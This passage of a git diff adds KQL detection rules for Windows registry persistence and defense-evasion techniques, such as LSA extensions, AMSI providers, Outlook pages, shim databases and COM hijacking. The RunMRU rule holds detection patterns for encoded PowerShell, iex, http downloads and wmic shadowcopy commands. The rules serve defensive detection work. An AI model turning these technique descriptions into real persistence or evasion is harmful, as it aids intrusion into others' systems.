+// Date: 2019-01-12
+// Level: medium
+// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence, attack.lateral-movement
+// False Positives:
+//   - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate
+
+DeviceRegistryEvents
+| where RegistryKey contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_lsa_extensions.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_lsa_extensions.kql
new file mode 100644
index 00000000..b86ff662
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_lsa_extensions.kql
@@ -0,0 +1,13 @@
+// Title: Potential Persistence Via LSA Extensions
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass.
+// The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv\\Extensions"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_mpnotify.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_mpnotify.kql
new file mode 100644
index 00000000..f6314db4
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_mpnotify.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Mpnotify
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_mycomputer_registry_keys.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_mycomputer_registry_keys.kql
new file mode 100644
index 00000000..015717af
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_mycomputer_registry_keys.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via MyComputer Registry Keys
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-09
+// Level: high
+// Description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer" and RegistryKey endswith "(Default)"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_netsh_helper_dll_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_netsh_helper_dll_registry.kql
new file mode 100644
index 00000000..5dd8c87f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_netsh_helper_dll_registry.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Netsh Helper DLL - Registry
+// Author: Anish Bogati
+// Date: 2023-11-28
+// Level: medium
+// Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007
+// False Positives:
+//   - Legitimate helper added by different programs and the OS
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh") and (not(((RegistryValueData in~ ("ipmontr.dll", "iasmontr.dll", "ippromon.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql
new file mode 100644
index 00000000..5a6f60be
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql
@@ -0,0 +1,14 @@
+// Title: Potential Persistence Via New AMSI Providers - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections.
+// Attackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content.
+// This technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Legitimate security products adding their own AMSI providers. Filter these according to your environment.
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\AMSI\\Providers*" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers*") and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe")) and RegistryKey contains "\\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe")) and RegistryKey contains "\\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Avira\\Endpoint Protection SDK\\endpointprotection.exe" and RegistryKey contains "\\{00000001-3DCC-4B48-A82E-E2071FE58E05}"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_home_page.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_home_page.kql
new file mode 100644
index 00000000..c3b4845d
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_home_page.kql
@@ -0,0 +1,11 @@
+// Title: Potential Persistence Via Outlook Home Page
+// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand
+// Date: 2021-06-09
+// Level: high
+// Description: Detects potential persistence activity via outlook home page.
+// An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\WebView*") and RegistryKey endswith "\\URL"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql
new file mode 100644
index 00000000..f38cc1af
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-04-05
+// Level: high
+// Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+
+DeviceRegistryEvents
+| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\LoadMacroProviderOnBoot"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_today_page.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_today_page.kql
new file mode 100644
index 00000000..fe33ee24
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_outlook_today_page.kql
@@ -0,0 +1,11 @@
+// Title: Potential Persistence Via Outlook Today Page
+// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand
+// Date: 2021-06-10
+// Level: high
+// Description: Detects potential persistence activity via outlook today page.
+// An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Today*") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Stamp") or (RegistryKey endswith "\\URL" or RegistryKey endswith "\\UserDefinedUrl")) and (not((InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_scrobj_dll_com_hijacking.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_scrobj_dll_com_hijacking.kql
new file mode 100644
index 00000000..2eba3e8e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_scrobj_dll_com_hijacking.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Scrobj.dll COM Hijacking
+// Author: frack113
+// Date: 2022-08-20
+// Level: medium
+// Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+//   - Legitimate use of the dll.
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "C:\\WINDOWS\\system32\\scrobj.dll" and RegistryKey endswith "InprocServer32\\(Default)"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_in_uncommon_location.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_in_uncommon_location.kql
new file mode 100644
index 00000000..974e2b41
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_in_uncommon_location.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Shim Database In Uncommon Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-01
+// Level: high
+// Description: Detects the installation of a new shim database where the file is located in a non-default location
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB*" and RegistryKey contains "\\DatabasePath") and (not(RegistryValueData contains ":\\Windows\\AppPatch\\Custom"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_modification.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_modification.kql
new file mode 100644
index 00000000..b7942226
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_shim_database_modification.kql
@@ -0,0 +1,13 @@
+// Title: Potential Persistence Via Shim Database Modification
+// Author: frack113
+// Date: 2021-12-30
+// Level: medium
+// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
+// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+// False Positives:
+//   - Legitimate custom SHIM installations will also trigger this rule
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom*") and (not((RegistryValueData =~ "" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_typedpaths.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_typedpaths.kql
new file mode 100644
index 00000000..519f52b7
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_typedpaths.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via TypedPaths
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: high
+// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths*" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\SysWOW64\\explorer.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_persistence_via_visual_studio_tools_for_office.kql b/KQL/rules/windows/registry/registry_set/potential_persistence_via_visual_studio_tools_for_office.kql
new file mode 100644
index 00000000..a9a51619
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_persistence_via_visual_studio_tools_for_office.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Visual Studio Tools for Office
+// Author: Bhabesh Raj
+// Date: 2021-01-10
+// Level: medium
+// Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
+// MITRE Tactic: Persistence
+// Tags: attack.t1137.006, attack.persistence
+// False Positives:
+//   - Legitimate Addin Installation
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Software\\Microsoft\\Office\\Outlook\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Word\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Excel\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Powerpoint\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\VSTO\\Security\\Inclusion*") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe")) or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\Integrator.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\Teams.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files (x86)\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe"))))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files (x86)\\Avast Software\\Avast\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files (x86)\\AVG\\Antivirus\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt*"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_powershell_execution_policy_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_powershell_execution_policy_tampering.kql
new file mode 100644
index 00000000..8d5f1bf8
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_powershell_execution_policy_tampering.kql
@@ -0,0 +1,10 @@
+// Title: Potential PowerShell Execution Policy Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-11
+// Level: medium
+// Description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains "Bypass" or RegistryValueData contains "Unrestricted") and (RegistryKey endswith "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy")) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql b/KQL/rules/windows/registry/registry_set/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql
new file mode 100644
index 00000000..3a401884
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql
@@ -0,0 +1,10 @@
+// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-08-02
+// Level: high
+// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Provisioning\\Commands*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_psfactorybuffer_com_hijacking.kql b/KQL/rules/windows/registry/registry_set/potential_psfactorybuffer_com_hijacking.kql
new file mode 100644
index 00000000..ca605a3c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_psfactorybuffer_com_hijacking.kql
@@ -0,0 +1,10 @@
+// Title: Potential PSFactoryBuffer COM Hijacking
+// Author: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk
+// Date: 2023-06-07
+// Level: high
+// Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\CLSID\\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\\InProcServer32\\(Default)" and (not((RegistryValueData in~ ("%windir%\\System32\\ActXPrxy.dll", "C:\\Windows\\System32\\ActXPrxy.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_ransomware_activity_using_legalnotice_message.kql b/KQL/rules/windows/registry/registry_set/potential_ransomware_activity_using_legalnotice_message.kql
new file mode 100644
index 00000000..21eea4ca
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_ransomware_activity_using_legalnotice_message.kql
@@ -0,0 +1,10 @@
+// Title: Potential Ransomware Activity Using LegalNotice Message
+// Author: frack113
+// Date: 2022-12-11
+// Level: high
+// Description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1491.001
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "encrypted" or RegistryValueData contains "Unlock-Password" or RegistryValueData contains "paying") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeCaption" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LegalNoticeText")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql b/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql
new file mode 100644
index 00000000..51e89c61
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql
@@ -0,0 +1,12 @@
+// Title: Potential Registry Persistence Attempt Via DbgManagedDebugger
+// Author: frack113
+// Date: 2022-08-07
+// Level: medium
+// Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574
+// False Positives:
+//   - Legitimate use of the key to setup a debugger. Which is often the case on developers machines
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\.NETFramework\\DbgManagedDebugger" and (not(RegistryValueData =~ "\"C:\\Windows\\system32\\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_windows_telemetry.kql b/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_windows_telemetry.kql
new file mode 100644
index 00000000..6c5eee3c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_registry_persistence_attempt_via_windows_telemetry.kql
@@ -0,0 +1,13 @@
+// Title: Potential Registry Persistence Attempt Via Windows Telemetry
+// Author: Lednyov Alexey, oscd.community, Sreeman
+// Date: 2020-10-16
+// Level: high
+// Description: Detects potential persistence behavior using the windows telemetry registry key.
+// Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
+// This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
+// The problem is, it will run any arbitrary command without restriction of location or type.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains ".bat" or RegistryValueData contains ".bin" or RegistryValueData contains ".cmd" or RegistryValueData contains ".dat" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".hta" or RegistryValueData contains ".jar" or RegistryValueData contains ".js" or RegistryValueData contains ".msi" or RegistryValueData contains ".ps" or RegistryValueData contains ".sh" or RegistryValueData contains ".vb") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController*" and RegistryKey endswith "\\Command") and (not((RegistryValueData contains "\\system32\\CompatTelRunner.exe" or RegistryValueData contains "\\system32\\DeviceCensus.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_sentinelone_shell_context_menu_scan_command_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_sentinelone_shell_context_menu_scan_command_tampering.kql
new file mode 100644
index 00000000..9a5cd754
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_sentinelone_shell_context_menu_scan_command_tampering.kql
@@ -0,0 +1,10 @@
+// Title: Potential SentinelOne Shell Context Menu Scan Command Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-06
+// Level: medium
+// Description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\shell\\SentinelOneScan\\command*" and (not(((InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\SentinelOne\\") or (RegistryValueData contains "\\SentinelScanFromContextMenu.exe" and (RegistryValueData startswith "C:\\Program Files\\SentinelOne\\Sentinel Agent" or RegistryValueData startswith "C:\\Program Files (x86)\\SentinelOne\\Sentinel Agent")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_signing_bypass_via_windows_developer_features_registry.kql b/KQL/rules/windows/registry/registry_set/potential_signing_bypass_via_windows_developer_features_registry.kql
new file mode 100644
index 00000000..82091f61
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_signing_bypass_via_windows_developer_features_registry.kql
@@ -0,0 +1,10 @@
+// Title: Potential Signing Bypass Via Windows Developer Features - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-12
+// Level: high
+// Description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\Appx*") and (RegistryKey endswith "\\AllowAllTrustedApps" or RegistryKey endswith "\\AllowDevelopmentWithoutDevLicense")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_werfault_reflectdebugger_registry_value_abuse.kql b/KQL/rules/windows/registry/registry_set/potential_werfault_reflectdebugger_registry_value_abuse.kql
new file mode 100644
index 00000000..b368d77c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_werfault_reflectdebugger_registry_value_abuse.kql
@@ -0,0 +1,10 @@
+// Title: Potential WerFault ReflectDebugger Registry Value Abuse
+// Author: X__Junior
+// Date: 2023-05-18
+// Level: high
+// Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\ReflectDebugger"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql b/KQL/rules/windows/registry/registry_set/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
new file mode 100644
index 00000000..c557a628
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
@@ -0,0 +1,11 @@
+// Title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry
+// Author: Ahmed Farouk, Nasreddine Bencherchali
+// Date: 2024-11-01
+// Level: high
+// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
+// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" and (((RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and (RegistryValueData contains " -e " or RegistryValueData contains " -ec " or RegistryValueData contains " -en " or RegistryValueData contains " -enc " or RegistryValueData contains " -enco" or RegistryValueData contains "ftp" or RegistryValueData contains "Hidden" or RegistryValueData contains "http" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-")) or (RegistryValueData contains "wmic" and (RegistryValueData contains "shadowcopy" or RegistryValueData contains "process call create")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potentially_suspicious_desktop_background_change_via_registry.kql b/KQL/rules/windows/registry/registry_set/potentially_suspicious_desktop_background_change_via_registry.kql
new file mode 100644
index 00000000..95eb3ee2
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potentially_suspicious_desktop_background_change_via_registry.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious Desktop Background Change Via Registry
+// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects registry value settings that would replace the user's desktop background.
+// This is a common technique used by malware to change the desktop background to a ransom note or other image.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001
+// False Positives:
+//   - Administrative scripts that change the desktop background to a company logo or other image.
+
+DeviceRegistryEvents
